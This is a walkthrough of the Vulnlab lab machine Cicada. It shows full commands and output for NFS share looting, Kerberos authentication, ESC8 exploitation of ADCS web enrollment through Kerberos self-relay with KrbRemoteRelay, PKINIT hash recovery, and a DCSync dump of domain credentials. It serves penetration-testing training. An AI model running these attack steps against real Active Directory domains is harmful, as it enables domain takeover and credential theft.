Post

VL Cicada

VL Cicada

Cicada is a medium-difficulty machine on Vulnlab that involves exploiting ESC8 via Kerberos relaying in order to bypass self-relay restrictions.

Enumeration

Port scan:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Nmap scan report for 10.10.104.125
Host is up (0.025s latency).
Not shown: 984 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-10-04 08:51:28Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
2049/tcp open  mountd        1-3 (RPC #100005)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.vl0., Site: Default-First-Site-Name)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5357/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

We see that we are dealing with a domain controller, that there is a web server on port 80 and that there is NFS running. Let’s check out NFS first.

1
2
3
4
showmount -e 10.10.104.125

Export list for 10.10.104.125:
/profiles (everyone)

We mount the directory to check the contents and eventually find some images:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
mkdir share
sudo mount -t nfs -o rw,vers=4 10.10.104.125:/profiles $PWD/share

ls -lahR share | grep -B5 png

share/Administrator:
total 1,5M
drwxrwxrwx 2 nobody nogroup   64 Sep 15 15:25 .
drwxrwxrwx 2 nobody nogroup 4,0K Sep 15 15:18 ..
drwx------ 2 nobody nogroup   64 Sep 15 15:25 Documents
-rwxrwxrwx 1 nobody nogroup 1,5M Sep 13 18:12 vacation.png

share/Rosie.Powell:
total 1,8M
drwxrwxrwx 2 nobody nogroup   64 Sep 15 15:25 .
drwxrwxrwx 2 nobody nogroup 4,0K Sep 15 15:18 ..
drwx------ 2 nobody nogroup   64 Sep 15 15:25 Documents
-rwx------ 1 nobody nogroup 1,8M Sep 13 18:09 marketing.png

Exploitation

After downloading the images, we find one is of an employee that has a note with a password on their desk. We try to authenticate with the credentials:

1
2
3
nxc smb 10.10.104.125 -u 'rosie.powell' -p '***'
SMB         10.10.104.125   445    10.10.104.125    [*]  x64 (name:10.10.104.125) (domain:10.10.104.125) (signing:True) (SMBv1:False)
SMB         10.10.104.125   445    10.10.104.125    [-] 10.10.104.125\rosie.powell:*** STATUS_NOT_SUPPORTED

This shows STATUS_NOT_SUPPORTED which is the case because NTLM is not enabled on this domain. In order to get around this, we can authenticate with Kerberos instead (which needs the FQDN instead of the IP, so you will need to add it your hosts file or use the machines DNS server):

1
2
3
nxc smb dc-jpq225.cicada.vl -u 'rosie.powell' -p '***' -k
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [*]  x64 (name:dc-jpq225) (domain:cicada.vl) (signing:True) (SMBv1:False)
SMB         dc-jpq225.cicada.vl 445    dc-jpq225        [+] cicada.vl\rosie.powell:***

Now the credentials show as valid. At this point we can do some more enumeration like collecting bloodhound data, looking at shares and manually going through LDAP. In this case, it won’t really help though.

The web server on port 80 has just the default IIS page, but if we check /certsrv/ we note that this is the endpoint for the ADCS web enrollment. Without checking the web server, you’d also get this information from certipy:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
getTGT.py cicada.vl/rosie.powell:'***' -dc-ip 10.10.104.125
export KRB5CCNAME=rosie.powell.ccache

certipy find -k -no-pass -ns 10.10.104.125 -debug -dc-ip dc-jpq225.cicada.vl
...
[*] Saved text output to '20241004135207_Certipy.txt'
[*] Saved JSON output to '20241004135207_Certipy.json'

cat 20241004135207_Certipy.txt
...
Certificate Authorities
  0
    CA Name                             : cicada-DC-JPQ225-CA
    DNS Name                            : DC-JPQ225.cicada.vl
    Certificate Subject                 : CN=cicada-DC-JPQ225-CA, DC=cicada, DC=vl
    Certificate Serial Number           : 66D35978EDC54F9A492AC71194832260
    Certificate Validity Start          : 2024-10-04 08:43:06+00:00
    Certificate Validity End            : 2524-10-04 08:53:06+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CICADA.VL\Administrators
      Access Rights
        ManageCertificates              : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        ManageCa                        : CICADA.VL\Administrators
                                          CICADA.VL\Domain Admins
                                          CICADA.VL\Enterprise Admins
        Enroll                          : CICADA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
...

If the web enrollment is active and no extra mitigation steps have been taken, it can be exploited by relaying the authentication of a privileged machine (for example a domain controller) to it. This is a pretty common vulnerability and widely known as ESC8. Usually this needs at least 2 machines, where you would relay a domain controller via your own attacker controlled machine to the web endpoint on the CA. Relaying back to the same machine shouldn’t be possible due to self-relay mitigations that have been introduced quite a while ago.

Recent research has shown, that it is still possible to do in this case by relaying Kerberos instead of NTLM.

The attack has been automated in KrbRemoteRelay by Cicada8 Research (hence the name of the machine). Since this runs on Windows and we only have one target machine available, we’ll use a Windows VM to perform the attack.

Since the machine account quota is 10, you could domain join your own Windows VM to run it, but it’s also sufficient to get a TGT & RPCSS TGS, inject it on a non-domain joined windows machine and then run the tool.

For the domain joined way, connect to the VPN and then make sure to set the DNS entry to the Cicada DC. It’s important to keep IPv6 enabled in the adapter or enable if its not yet the case.

Then join the machine to the domain using the credentials of Rosie Powell. After a restart, you can run the tool to get a certificate for the domain controller:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3

                            /\_/\____,
                  ,___/\_/\ \  ~     /
                  \     ~  \ )   XXX
                    XXX     /    /\_/\___,
                       \o-o/-o-o/   ~    /
                        ) /     \    XXX
                       _|    / \ \_/
                    ,-/   _  \_/   \
                   / (   /____,__|  )
                  (  |_ (    )  \) _|
                 _/ _)   \   \__/   (_
                (,-(,(,(,/      \,),),)

                CICADA8 Research Team
                From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06...
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b305...
[+] HTTP session established
[+] Cookie ASPSESSIONIDSSDRDQTA=IHPNGIODCGPMFFNKEE...; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 17)
[+] Certificate in PKCS12: MIACAQ...

Save the resulting base64-encoded certificate on your Linux VM and swap back the VPN:

1
echo -ne "MIACAQ..." | base64 -d > cert.p12

Now we can authenticate via PKINIT:

1
2
3
4
5
6
7
8
9
certipy auth -pfx cert.p12 -dc-ip 10.10.104.125 -domain cicada.vl
export KRB5CCNAME=dc-jpq225.ccache

[*] Using principal: dc-jpq225$@cicada.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:***

We use the resulting ticket to perform a dcsync attack:

1
2
3
4
5
6
export KRB5CCNAME=dc-jpq225.ccache
secretsdump.py -k -no-pass cicada.vl/dc-jpq225\$@cicada.vl@dc-jpq225.cicada.vl -just-dc

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0...

Finally you can get a ticket for the administrator user and then WinRM to the machine to read the flag.

If you want to do it without the domain join, you need to still run the VPN on Windows, setup the DNS and then request a TGT and a service ticket for RPCSS (otherwise you’d get “The RPC server is unavailable”):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
Rubeus.exe asktgt /user:rosie.powell /domain:cicada.vl /password:*** /dc:10.10.104.125 /ptt /nowrap

Rubeus.exe asktgs /service:RPCSS/dc-jpq225.cicada.vl /dc:10.10.104.125 /ptt /ticket:doI...
...
klist

#0>     Client: rosie.powell @ CICADA.VL
        Server: krbtgt/cicada.vl @ CICADA.VL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
        Start Time: 10/4/2024 4:48:38 (local)
        End Time:   10/4/2024 14:48:38 (local)
        Renew Time: 10/11/2024 4:48:38 (local)
        Session Key Type: RSADSI RC4-HMAC(NT)
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

#1>     Client: rosie.powell @ CICADA.VL
        Server: RPCSS/dc-jpq225.cicada.vl @ CICADA.VL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 10/4/2024 4:48:56 (local)
        End Time:   10/4/2024 14:48:38 (local)
        Renew Time: 10/11/2024 4:48:38 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:
This post is licensed under CC BY 4.0 by the author.